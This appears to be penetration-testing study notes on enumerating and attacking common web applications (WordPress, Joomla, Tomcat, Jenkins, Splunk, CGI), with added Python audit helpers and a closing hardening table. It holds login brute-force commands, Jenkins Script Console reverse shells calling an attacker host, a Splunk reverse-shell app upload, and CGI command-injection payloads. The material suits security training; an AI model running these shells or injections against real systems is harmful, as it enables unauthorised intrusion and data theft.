Common Web Applications

The following sections detail how to enumerate various web applications, which could lead to exploitation and access.

EyeWitness

For quick web application discovery.

# https://github.com/RedSiege/EyeWitness
git clone https://github.com/RedSiege/EyeWitness.git && cd EyeWitness/setup

# cmake is already a part of build-essential
sed -i 's/cmake//gI' ./setup.sh
sudo ./setup.sh
cd ..
source eyewitness-venv/bin/activate

# SCAN using nmap XML results output
mkdir ../scan_eyewitness
python Python/EyeWitness.py --web -x ../scan_nmap_disc_all_ports.xml -d ../scan_eyewitness

Wordpress

WPScan is great, but manual enumeration can sometimes uncover more information (e.g. certain plugins).

/robots.txt

User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
Disallow: /wp-content/uploads/wpforms/

Sitemap: https://inlanefreight.local/wp-sitemap.xml

Folders

  • /wp-admin
  • /wp-content
    • plugins: often a source of vulnerabilities
    • themes: same
    • scanning for readme.txt under these folders can find hidden resources
  • wp-login.php

Users

  • Administrator: can add and delete users and posts, as well as edit source code
    • leads to RCE!
  • Editor: can publish and manage all posts
  • Author: can publish and manage their own posts
  • Contributor: can write and manage their own posts but not publish
  • Subscriber: can browse posts and edit their profiles

Page Source

curl -so- '<TARGET>/robots.txt'
curl -s <TARGET> | grep -i -e WordPress -e themes -e plugins
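Added Python example (not the page's own code) that formalises the grep above: it pulls the WordPress core version from the generator meta tag and the plugin and theme slugs with their ?ver= versions from asset URLs, so a site owner can see exactly what the front page discloses; SAMPLE_HTML is a constructed page, not a capture from a real site.

```python
import re

# Constructed HTML fragment resembling a WordPress front page (not from a real site).
SAMPLE_HTML = """<html><head>
<meta name="generator" content="WordPress 6.2.2" />
<link rel="stylesheet" href="https://inlanefreight.local/wp-content/themes/twentytwentythree/style.css?ver=6.2.2" />
<link rel="stylesheet" href="https://inlanefreight.local/wp-content/plugins/wpforms-lite/assets/css/frontend.min.css?ver=1.8.2" />
<script src="https://inlanefreight.local/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7"></script>
<script src="https://inlanefreight.local/wp-includes/js/jquery/jquery.min.js?ver=3.6.4"></script>
</head><body></body></html>"""

# Matches /wp-content/<plugins|themes>/<slug>/<asset path>[?ver=<version>] up to the
# closing quote or whitespace of the attribute.
ASSET_RE = re.compile(
    r"/wp-content/(plugins|themes)/([A-Za-z0-9_.-]+)/[^\s\"']*?(?:\?ver=([0-9.]+))?[\"'\s]"
)
# Core version disclosed by the generator meta tag (only present on some sites).
GENERATOR_RE = re.compile(
    r'<meta[^>]+name="generator"[^>]+content="WordPress ([0-9.]+)"', re.I
)


def fingerprint_wordpress(html):
    """Return {'core': version|None, 'plugins': {slug: ver|None}, 'themes': {slug: ver|None}}."""
    core = GENERATOR_RE.search(html)
    result = {"core": core.group(1) if core else None, "plugins": {}, "themes": {}}
    for kind, slug, ver in ASSET_RE.findall(html):
        # A slug usually appears several times; keep the first version string seen.
        result[kind].setdefault(slug, ver or None)
    return result


if __name__ == "__main__":
    for key, value in fingerprint_wordpress(SAMPLE_HTML).items():
        print(key, value)
```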

WPScan

# Generic enumeration
sudo wpscan -t 20 --api-token <API_TOKEN> --url <TARGET> --enumerate

# Enumerate all plugins
sudo wpscan -t 20 --api-token <API_TOKEN> --url <TARGET> --enumerate ap

# Login brute-force
sudo wpscan -t 20 --url <TARGET> --password-attack xmlrpc -U <USER> -P /usr/share/wordlists/rockyou.txt

Joomla

/robots.txt

...
User-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/
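Added Python example (not the page's own code) covering the WordPress and Joomla robots.txt listings above: it parses the Allow/Disallow/Sitemap directives and guesses the CMS from the paths a robots.txt advertises, which is the same signal an outside observer gets for free. The CMS_MARKERS table is an assumption drawn from these two listings and the sample files are the ones quoted on this page.

```python
# Constructed samples: the WordPress robots.txt quoted above and a trimmed Joomla one.
WP_ROBOTS = """User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
Disallow: /wp-content/uploads/wpforms/

Sitemap: https://inlanefreight.local/wp-sitemap.xml
"""

JOOMLA_ROBOTS = """User-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /components/
Disallow: /plugins/
"""

# Paths characteristic of a CMS (assumption: derived from the listings on this page).
CMS_MARKERS = {
    "WordPress": ("/wp-admin/", "/wp-content/", "/wp-includes/"),
    "Joomla": ("/administrator/", "/components/", "/libraries/"),
}


def parse_robots(text):
    """Return {'disallow': [...], 'allow': [...], 'sitemaps': [...]} from robots.txt text."""
    out = {"disallow": [], "allow": [], "sitemaps": []}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()      # drop comments and blank lines
        if ":" not in line:
            continue
        key, _, value = line.partition(":")       # split at the first colon only (URLs contain colons)
        key, value = key.strip().lower(), value.strip()
        if key == "disallow" and value:           # an empty Disallow means "allow everything"
            out["disallow"].append(value)
        elif key == "allow" and value:
            out["allow"].append(value)
        elif key == "sitemap":
            out["sitemaps"].append(value)
    return out


def fingerprint_cms(text):
    """Guess the CMS from the disallowed paths; None when no marker matches."""
    paths = parse_robots(text)["disallow"]
    scores = {cms: sum(any(p.startswith(m) for p in paths) for m in markers)
              for cms, markers in CMS_MARKERS.items()}
    best = max(scores, key=scores.get)
    return best if scores[best] else None
```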

Page Source

curl -s <TARGET>/README.txt
curl -s <TARGET>/administrator/manifests/files/joomla.xml | xmllint --format -
curl -s <TARGET> | grep -i Joomla

Scanning

pip3 install droopescan 

droopescan scan joomla --url <TARGET>

Drupal

Users:

  • Administrator: has complete control over the Drupal website.
  • Authenticated User: can log in to the website and perform operations such as adding and editing articles based on their permissions.
  • Anonymous: All website visitors are designated as anonymous. By default, these users are only allowed to read posts.

Page Source

curl -s <TARGET> | grep -i Drupal

# Version (older Drupals only)
curl -s <TARGET> | grep -m2 ""

Scanning

pip3 install droopescan

droopescan scan drupal --url <TARGET>

Tomcat

  • webapps/conf/tomcat-users.xml: users, passwords and roles for the Manager web application
  • webapps/manager/WEB-INF/web.xml: deployment descriptor mapping the Manager's URL routes to servlet classes
  • webapps/manager/WEB-INF/classes/: compiled application logic, possibly containing sensitive information
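Added Python example, not the page's own code: a small audit of a tomcat-users.xml that flags accounts holding Manager/Host-Manager roles with default or short passwords, which is the file an attacker reads first and the one an administrator should check first. The sample XML, the PRIVILEGED_ROLES set and the WEAK_PASSWORDS list are constructed assumptions (the tomcat/s3cret pair is the placeholder used in the Tomcat documentation).

```python
import xml.etree.ElementTree as ET

# Constructed sample in the layout of tomcat-users.xml (not from a real server).
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="admin-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,admin-gui"/>
  <user username="ops" password="Summer24" roles="manager-gui"/>
  <user username="deploy" password="Xq9!vLp2#tRw8zGm" roles="manager-script"/>
  <user username="viewer" password="tomcat" roles="manager-status"/>
</tomcat-users>
"""

# Roles that allow deploying applications or managing virtual hosts via the Manager apps.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx", "admin-gui", "admin-script"}
# Assumption: a tiny list of default/well-known values; a real audit would use a larger list.
WEAK_PASSWORDS = {"tomcat", "s3cret", "admin", "password", "manager"}


def audit_tomcat_users(xml_text, min_length=12):
    """Return a list of (username, reason) findings for risky privileged accounts."""
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        if not elem.tag.endswith("user"):          # tolerate the namespace prefix on the tag
            continue
        name = elem.get("username", "")
        pwd = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        if not roles & PRIVILEGED_ROLES:
            continue                               # read-only roles such as manager-status are out of scope
        if pwd.lower() in WEAK_PASSWORDS:
            findings.append((name, "default or well-known password"))
        elif len(pwd) < min_length:
            findings.append((name, "password shorter than %d characters" % min_length))
    return findings


if __name__ == "__main__":
    for user, reason in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print("%s: %s" % (user, reason))
```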

Apache Jserv and Tomcat

sudo nmap -sV -p 8009,8080 <TARGET>

Page Source

curl -s <TARGET>/invalid | grep Tomcat 
curl -s <TARGET>/docs/ | grep Tomcat 

Find Web Manager Pages (/manager or /host-manager)

feroxbuster -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -u <TARGET>

Brute-Force Web Manager

msfconsole
use auxiliary/scanner/http/tomcat_mgr_login
set rhosts <TARGET>
set VHOST <FQDN>
set RPORT <PORT>
set stop_on_success true
run

Jenkins

Agent (slave) attach port (5000) and Tomcat web interface (8080)

sudo nmap -sV -p 5000,8080 <TARGET>

Script Console

Linux

# Execute System Command
def cmd = '<COMMAND>'
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = cmd.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println sout

# Reverse Shell Callback (start the listener on the attacking host first)
nc -lvnp <PORT>

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<ATTACKER_IP>/<PORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Windows

nc -lvnp <PORT>

# Reverse Shell Callback
String host="<ATTACKER_IP>";
int port=<PORT>;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
  while(pi.available()>0)so.write(pi.read());
  while(pe.available()>0)so.write(pe.read());
  while(si.available()>0)po.write(si.read());
  so.flush();po.flush();Thread.sleep(50);
  try {p.exitValue();break;}catch (Exception e){}
};
p.destroy();s.close();

Splunk

Weak or missing authentication is the most likely vector.

Splunk WebApp

sudo nmap -sV -p 8000,8089 <TARGET>

Uploading Callback Shell

<TARGET>/en-US/app/launcher/home

# Splunk Reverse Shell
git clone https://github.com/0xjpuff/reverse_shell_splunk.git
cd reverse_shell_splunk/reverse_shell_splunk/

# !!! UPDATE !!!
# Change 'attacker_ip_here' and attacker_port_here in the respective script(s)

cd ..
tar -cvzf updater.tar.gz reverse_shell_splunk/

nc -lvnp 8443

# NOTE: uploading the app causes it to run immediately; ensure `nc` is listening first
# From <TARGET>/en-US/manager/search/apps/local > Install app from file

PRTG Network Monitor

PRTG WebApp

sudo nmap -sV -p 80,443,8080 <TARGET>
curl -s <TARGET> | grep -i Version

osTicket

For some public-facing services, one can acquire a valid internal email address by submitting a ticket, though this might require email activation.

Gitlab

CGI

  • Check in:
    • cgi
    • cgi-bin

# Overall (though a bit blunt)
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/LEGACY-SERVICES/CGIs/CGIs.txt -u 'http://<TARGET>/'

# Windows
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x "bat,cmd,exe,vbs,cgi" -u 'http://<TARGET>/cgi/'
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x "bat,cmd,exe,vbs,cgi" -u 'http://<TARGET>/cgi-bin/'

# Linux
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x "sh,cgi,pl,py" -u "http://<TARGET>/cgi/"
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x "sh,cgi,pl,py" -u "http://<TARGET>/cgi-bin/"

NOTE: any command injection might require URL-encoding of the commands, though curl's --data-urlencode option does this for you.

# CONFIRM
curl -s --get 'http://<URL>/cgi/welcome.bat' --data-urlencode '& dir'
curl -s --get 'http://<URL>/cgi/welcome.bat' --data-urlencode '& C:\windows\system32\ipconfig.exe'

# File reads ("TACOMAN" is an arbitrary string not expected in the file; /V prints every line that does not contain it)
curl -s --get 'http://<URL>/cgi/welcome.bat' --data-urlencode '& C:\Windows\System32\find.exe /V "TACOMAN" <FILE>'

Remember that certain commands, such as type or dir, are built into cmd.exe and do not exist as separate .exe files.

ColdFusion

  • On TCP/8500, ColdFusion exposes the following directories:
    • CFIDE
    • cfdocs

CF Stack

# Mail, HTTP, HTTPS, RPC, Server Monitor, SSL
sudo nmap -sV -p 25,80,443,1935,5500,8500 <TARGET>

IIS

# HTTP, HTTPS, MSSQL, WinRM, WinRM Secure, Alt Port, Alt Port, Web Deploy
sudo nmap -sV -p 80,443,1433,5985,5986,8000,8080,8172 <TARGET>

LDAP

sudo nmap -sV -p 389,636 <TARGET>

Hardening

Application (Hardening Category): Discussion

  • WordPress (Security monitoring): Use a security plugin such as WordFence, which includes security monitoring, blocking of suspicious activity, country blocking, two-factor authentication, and more
  • Joomla (Access controls): A plugin such as AdminExile can be used to require a secret key to log in to the Joomla admin page, such as http://joomla.inlanefreight.local/administrator?thisismysecretkey
  • Drupal (Access controls): Disable, hide, or move the admin login page
  • Tomcat (Access controls): Limit access to the Tomcat Manager and Host-Manager applications to only localhost. If these must be exposed externally, enforce IP whitelisting and set a very strong password and non-standard username.
  • Jenkins (Access controls): Configure permissions using the Matrix Authorization Strategy plugin
  • Splunk (Regular updates): Make sure to change the default password and ensure that Splunk is properly licensed to enforce authentication
  • PRTG Network Monitor (Secure authentication): Make sure to stay up-to-date and change the default PRTG password
  • osTicket (Access controls): Limit access from the internet if possible
  • GitLab (Secure authentication): Enforce sign-up restrictions such as requiring admin approval for new sign-ups, and configure allowed and denied domains